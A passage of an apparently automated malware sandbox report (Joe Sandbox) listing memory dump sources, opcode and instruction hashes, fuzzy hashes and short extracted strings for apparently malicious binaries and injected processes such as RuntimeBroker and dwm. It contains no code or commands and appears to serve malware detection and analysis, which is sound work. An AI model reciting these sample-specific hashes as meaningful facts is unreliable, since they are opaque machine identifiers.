                                                                      • Instruction ID: dd39e8963edf33e60e419be48eac3fd94ab818aadd8b876e74094c02d44a31b3
                                                                      • Opcode Fuzzy Hash: 78cac705c1602da8bc8a809b3315298d8498604d3acd7493d01185dbdd442ba8
                                                                      • Instruction Fuzzy Hash: 27F0E5276594555FD204BB2CD8A68E437A0FF82229B4842F6C04ECB0B3DC0A5C8ACBC1
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4716e9fb2afb4ec008793e1ae1de5cb4869d03d4e69d6e534a5d131e5ed2b60
                                                                      • Instruction ID: cb509c25a2256436d1d25cceb0e31ae234ebd8798611f5fb0137c8cdc18c6b39
                                                                      • Opcode Fuzzy Hash: f4716e9fb2afb4ec008793e1ae1de5cb4869d03d4e69d6e534a5d131e5ed2b60
                                                                      • Instruction Fuzzy Hash: F8F0963190E3C28FD7528F78CC915A43BA0EF1B34470D8AEAC4498B1E7D6687568D791
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1379676886b94ca0fb9b369bbdc81bc7d089454d6dd623cb896599d93fea1c4
                                                                      • Instruction ID: c8631a4c6a47a3b156391c94b7e6210cf6e036d7e0468e1106540ab25f524ef0
                                                                      • Opcode Fuzzy Hash: b1379676886b94ca0fb9b369bbdc81bc7d089454d6dd623cb896599d93fea1c4
                                                                      • Instruction Fuzzy Hash: 8DE0D871A29B8C8FDF90A7A998156E97BE0FF85354F040069F00DD3281C6215D95C392
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a5043e52b65a0f9b6c6423224325c59dbc22fcb2386c15bace55414dbc24798
                                                                      • Instruction ID: ea05384b1d45f79f34d3ae902d5cfd69cd925ff26daf31083495a12545ea994e
                                                                      • Opcode Fuzzy Hash: 4a5043e52b65a0f9b6c6423224325c59dbc22fcb2386c15bace55414dbc24798
                                                                      • Instruction Fuzzy Hash: 54D0C914A1F557C5F1784F09446127951947F0B381F28C4BEC07F418F2CD1C744A6281
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48f4f5111794584fcde3a5e8a3274244d6c5c7124cab573755c597ed6fded9e2
                                                                      • Instruction ID: 8544362d18456b3f6c717ffecfe2fa96a4a5488589b719c4e3accacad045f3ba
                                                                      • Opcode Fuzzy Hash: 48f4f5111794584fcde3a5e8a3274244d6c5c7124cab573755c597ed6fded9e2
                                                                      • Instruction Fuzzy Hash: 2EC04C52F59D6697F2597628C42167F0856DF84658F9444B4E00EC73D6DD0C9B1112C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2656233662.00007FFAAB960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab960000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b000e5459ec46fc552a6e7e87cd68d5d8cf07ad722df81874c6b05a150cba2f
                                                                      • Instruction ID: 10b52abff86a53b981a8b4b2cb3fd8cb5ba4ecf22f98aaea54d3dd68db2b64dc
                                                                      • Opcode Fuzzy Hash: 2b000e5459ec46fc552a6e7e87cd68d5d8cf07ad722df81874c6b05a150cba2f
                                                                      • Instruction Fuzzy Hash: 02B09231446509CBD658A7A8B0410A03661AB4A21979125A8E00D8A2A6CA6BACE78784
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0511c00046cd78565544cd89eb027ea0736e200201f3d3ad77b1928229fa64b
                                                                      • Instruction ID: b516cd8db13572dd537768e610eb83fc1ce37000f5c687d36d98c8e72f210e90
                                                                      • Opcode Fuzzy Hash: b0511c00046cd78565544cd89eb027ea0736e200201f3d3ad77b1928229fa64b
                                                                      • Instruction Fuzzy Hash: 39C04C45E0E283D7E6211268049147D16800B1B28075555B5D10E461E3D85CB8495295
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52c9ddaf208fff53ee9796a7c55b462e5761300fb97544581cd716c51e9562a2
                                                                      • Instruction ID: dd001c852b7743acf01ead4c05198b5d67f563924579e14bb72a22c0b9d1013e
                                                                      • Opcode Fuzzy Hash: 52c9ddaf208fff53ee9796a7c55b462e5761300fb97544581cd716c51e9562a2
                                                                      • Instruction Fuzzy Hash: BFB01201C9740701980436B51C4247470106B46180FC44870E81C402869C4D10990192
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62b97987db2caf57f37ff8684e5c26434e459e4a1f6875a8e970df1f793bdeac
                                                                      • Instruction ID: a7e4542a65e6f70c925b200ef0091148c204e36ad237dc434f19a99b1977df96
                                                                      • Opcode Fuzzy Hash: 62b97987db2caf57f37ff8684e5c26434e459e4a1f6875a8e970df1f793bdeac
                                                                      • Instruction Fuzzy Hash: E4B01210C5B40A42D42433FE09430B470409B46294FC14070D42C40092984D109D01C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $r63$r63$r63
                                                                      • API String ID: 0-1891216863
                                                                      • Opcode ID: 9415e914db2f474bb48bb11ab78b75fa58098b8d90b838b74f689305fe401b99
                                                                      • Instruction ID: 074dbce7f839c99f22a9a69b5783a4ebcfb8e31a5309e836ab70ab4048ea2ee0
                                                                      • Opcode Fuzzy Hash: 9415e914db2f474bb48bb11ab78b75fa58098b8d90b838b74f689305fe401b99
                                                                      • Instruction Fuzzy Hash: C3217B62A0C94A4BF71CAB64C4197BA72D5EB62350F40C27EE05FC31D3ED6D680646C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2656233662.00007FFAAB960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab960000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $#$-$3
                                                                      • API String ID: 0-426809724
                                                                      • Opcode ID: e12c0980f613db4d370f180f2619a1107b2694de91ed9fd3a2bec4a5f83b00a7
                                                                      • Instruction ID: baad1cd26396f38689e6caba248cc4b0091e8778fb5b6deda95317b223483864
                                                                      • Opcode Fuzzy Hash: e12c0980f613db4d370f180f2619a1107b2694de91ed9fd3a2bec4a5f83b00a7
                                                                      • Instruction Fuzzy Hash: A511563481D215CBEB199A44D4933B4B3D4FB45740F208179CCBE426D2FA3979AA46C7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5X_H$b43$r63$r63
                                                                      • API String ID: 0-1044410338
                                                                      • Opcode ID: d5e9c42409e43e8c84c7ef602d023257c69b878cd186c6e57c3fe2ad35987aa9
                                                                      • Instruction ID: ed7a7846dba452c8fb36e5063d5b472e5d972b1eb628506d54a5a4574eba0b43
                                                                      • Opcode Fuzzy Hash: d5e9c42409e43e8c84c7ef602d023257c69b878cd186c6e57c3fe2ad35987aa9
                                                                      • Instruction Fuzzy Hash: 609117B6A0AA898FE749DF68C8657AD7FE1FB96350F4440AEC04DD73E2CA781444C780
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ef1e98d9b68ba7d4c37c89a7eedbc49a8fadbcf2018b3c8db06b890da914462
                                                                      • Instruction ID: e137d068d438d23d02ae6facc2f6a5a2fc83b20d9fd53ce8c84dddd3961a9d3b
                                                                      • Opcode Fuzzy Hash: 3ef1e98d9b68ba7d4c37c89a7eedbc49a8fadbcf2018b3c8db06b890da914462
                                                                      • Instruction Fuzzy Hash: D4413E3264C9155FD715EB7CE4899F87BE0EF86321B0509BBD08ACB067DA20AC82C3C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7377bf824f7d7d600c6bb71e168f34228cfdd9576695743491d482e75cf294d
                                                                      • Instruction ID: 8567c3a51acda24a9c6413c6800aa3f616dbba89d0a8f802a1c3da3c0adf63bf
                                                                      • Opcode Fuzzy Hash: c7377bf824f7d7d600c6bb71e168f34228cfdd9576695743491d482e75cf294d
                                                                      • Instruction Fuzzy Hash: CA413652A4E6962FE705B77CE05A5F87BD0EF86361B1548FAD04EC71B3CD186882C2C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96db699d66a13112004949870e6c0974d9d65f54357d61c80f5d8964d7c00f62
                                                                      • Instruction ID: afdc9b056d2e32c278ef4d02a94240d82f1ccc4a072ecb1b305ed12ab2e7ace6
                                                                      • Opcode Fuzzy Hash: 96db699d66a13112004949870e6c0974d9d65f54357d61c80f5d8964d7c00f62
                                                                      • Instruction Fuzzy Hash: 8C31E360A1AA595FE788F778845AAB977D2EB99350F1440BDE40EC33E3DD18A8818381
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e260b63e56fe282def90286e67da9b823a762b0a3d5e372c506b7ae2221df911
                                                                      • Instruction ID: 2f108efce297fe2c2bc39ef8334c547788e254aae91e9cfa00527482bc055ed3
                                                                      • Opcode Fuzzy Hash: e260b63e56fe282def90286e67da9b823a762b0a3d5e372c506b7ae2221df911
                                                                      • Instruction Fuzzy Hash: 6521F83130DC184FE768EB0CE889DB973D5EB5A32170101BAE58EC7136E921EC9287C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f3652baa7d94f1bbbd050287839fa1a7106e7ef2ee2196f3b2ba9f9cac29c6fd
                                                                      • Instruction ID: 6f35d3d336e17c704b4b7fc2b19d49438189f8245d1b89a239e1d44fe3632f12
                                                                      • Opcode Fuzzy Hash: f3652baa7d94f1bbbd050287839fa1a7106e7ef2ee2196f3b2ba9f9cac29c6fd
                                                                      • Instruction Fuzzy Hash: 5C312452A0EA962FF354B37CE44A9B867D1EF85361B1444FED00EC32E3CC186C8682C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 361e2c19dccd268f1f21c511a62512f339bbc453ec5b8a89727d09f04d7570e0
                                                                      • Instruction ID: 8a432c8eb09ece7235e0c88127dbc08ab1d32e293aa98bb3eef88ec15f0cde00
                                                                      • Opcode Fuzzy Hash: 361e2c19dccd268f1f21c511a62512f339bbc453ec5b8a89727d09f04d7570e0
                                                                      • Instruction Fuzzy Hash: E531077190E64ACFEB45EB68C8559BD7BF0FF5A300B0445FED00DD71A2EA28A885C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c4cd9674803294a6d4943c8c5f27e4f874474576acdfc688e54f3063f32c895
                                                                      • Instruction ID: 653cabfffc133f26625d98582cf8a5d31946d542da9f513f820922ddcc4ccd9c
                                                                      • Opcode Fuzzy Hash: 3c4cd9674803294a6d4943c8c5f27e4f874474576acdfc688e54f3063f32c895
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5Z_H$b43$r63$r63
                                                                      • API String ID: 0-999556193
                                                                      • Opcode ID: c78fb647532b60b56b8a88db8630ac2edb317b7c552bcbfad58d42df461483cf
                                                                      • Instruction ID: 0fd37244487eedcabaf2ef3ab66c0c73c06ab9e3b63cd79d3f2727eca447a344
                                                                      • Opcode Fuzzy Hash: c78fb647532b60b56b8a88db8630ac2edb317b7c552bcbfad58d42df461483cf
                                                                      • Instruction Fuzzy Hash: 409106B6A08A998FE789DF68C8757A97FE1FB56350F4441BEC14DC73E2CA7818148780
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f8b01b08ecf61459951f1402fc08fab6c590433a95404cc5790c90eca68154fc
                                                                      • Instruction ID: b870b6bc90a23b9add67cbd2ca7872be046cab6a3111a16cd423a2fb10a2e75b
                                                                      • Opcode Fuzzy Hash: f8b01b08ecf61459951f1402fc08fab6c590433a95404cc5790c90eca68154fc
                                                                      • Instruction Fuzzy Hash: 0A412F3264CA648FD714FBACE4889F97BE0EF8632170549BBD08ACB063D910AC8183C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65c44ebe34213f0e82be2f97b86c29ec9691fef569d38ee2753f0b51d72f3604
                                                                      • Instruction ID: b1fe7a8510dae9749c79319cb2cb978be8ec57e81a7801e55e0f30dd747b5337
                                                                      • Opcode Fuzzy Hash: 65c44ebe34213f0e82be2f97b86c29ec9691fef569d38ee2753f0b51d72f3604
                                                                      • Instruction Fuzzy Hash: D4412553A4EA956FE714B37CE05A5F97BD0DF86261B1449FED04EC61E3CD086C818281
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08c6728f1a8b6d71add1bda208ee08a443e4d2060fb4af297f818453c36a09c0
                                                                      • Instruction ID: 0db4638af725da169075f0f9aaaebba83fc66b4ada756ed6aef581b2d8141b0b
                                                                      • Opcode Fuzzy Hash: 08c6728f1a8b6d71add1bda208ee08a443e4d2060fb4af297f818453c36a09c0
                                                                      • Instruction Fuzzy Hash: F5311A61A0EE595FE788FB38846AAB977D2EF5A350B1441BDD40DC33E3DC18AC818381
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b5eaada6b88119fe47a1a0dcc18818da71804f5fe425aa5b0b0764aece94a42
                                                                      • Instruction ID: faf4efb2ab944e200b9afe7d364de4d2c9b83e7877de95e667fe599b5e5e9f02
                                                                      • Opcode Fuzzy Hash: 9b5eaada6b88119fe47a1a0dcc18818da71804f5fe425aa5b0b0764aece94a42
                                                                      • Instruction Fuzzy Hash: F121D53130DC184FE768EB0CE889DB973D1EB5A32170101BAE58EC7136E911EC8287C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 575cb75b5688d80c6b8503d196f636be2e4250fe5f0d58a606b3eba6cface2c4
                                                                      • Instruction ID: da89a8295f07baad562e83b883069ea3b78f08b74e70589aecacc72ff0405726
                                                                      • Opcode Fuzzy Hash: 575cb75b5688d80c6b8503d196f636be2e4250fe5f0d58a606b3eba6cface2c4
                                                                      • Instruction Fuzzy Hash: 17312652A0EA952FE754B77CE45A5B967D1DF863A1B1445FED00EC32E3CC086C414284
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7275be86fbfc55fd6e85d0aee1cdb062e1a8650c6e0439c5ade40b20b004807c
                                                                      • Instruction ID: 3c66c8bd4e0f44d8350ba148d56d44b53f3a7eb3108720acc20ead5eebb5daa7
                                                                      • Opcode Fuzzy Hash: 7275be86fbfc55fd6e85d0aee1cdb062e1a8650c6e0439c5ade40b20b004807c
                                                                      • Instruction Fuzzy Hash: 3431E83190DA4ACFEF45EB68C8559B97BF0FF5A300B0446FED00EC71A2DA299844C781
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13eea54a612a66fe4d5c0451b25578df6faf380015fa45d95976ac72a9353d0e
                                                                      • Instruction ID: 0eb793eec65b3b26ecb0dc0bc6ca4f1599837ac0bdc3533fe499a8001b13c7e3
                                                                      • Opcode Fuzzy Hash: 13eea54a612a66fe4d5c0451b25578df6faf380015fa45d95976ac72a9353d0e
                                                                      • Instruction Fuzzy Hash: C3310A7AA0DA45DBE716E768D8551EC7FA0EF83351F0486BBD00CCA2D3D938294987C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06cdbdd32651d0f4c1a1ec8a1cf2532ad167e7a570bfdf5a926b6e78c192ff04
                                                                      • Instruction ID: 1c0189a10cab81f6ccc0b0d1d47544908ddb9b5032059b3299170630c7ed728c
                                                                      • Opcode Fuzzy Hash: 06cdbdd32651d0f4c1a1ec8a1cf2532ad167e7a570bfdf5a926b6e78c192ff04
                                                                      • Instruction Fuzzy Hash: E821ED30D18959CFEB65DB04C4547A9B3E1FB59314F1086EEC40EE3295CA79AE85CB80
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f97c193fcbf650d94314d089b156427176c0741761e565a28f337b4d76389de9
                                                                      • Instruction ID: 2a59ae26bc7427f3c6d6ad4ad74413e2cd6fc66694184ddd4d7280093efb0704
                                                                      • Opcode Fuzzy Hash: f97c193fcbf650d94314d089b156427176c0741761e565a28f337b4d76389de9
                                                                      • Instruction Fuzzy Hash: 0C11A339A0DB49DFE716DB68C85119C7FB0EF43391F1586BBC048DB2A2D5341A4A87C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb4891b47e79cc1298ecf4ec1a405ab9bedba9242409e0ed000e6dcc5a414f97
                                                                      • Instruction ID: 2e0e37c187032897803a567ac2cce49fc3280105f8fe4737f82a21c29a15210f
                                                                      • Opcode Fuzzy Hash: cb4891b47e79cc1298ecf4ec1a405ab9bedba9242409e0ed000e6dcc5a414f97
                                                                      • Instruction Fuzzy Hash: 1601E139A0EB88DFE706DB68C85019C7FB0EF43390F0586BBC048CB2A2D5341A4987C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000001B.00000002.1653205670.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_27_2_7ffaab450000_dwm.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction ID: d205cd1d13fa8f7ca909effce5fe6d1af4686036fd923160bdf71b7e2847470a
                                                                      • Opcode Fuzzy Hash: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction Fuzzy Hash: 8301363091941DCBEB64EB14D8456F873A1FF56341F1080F9D84FD32A2DD386DE98A85
                                                                      Memory Dump Source
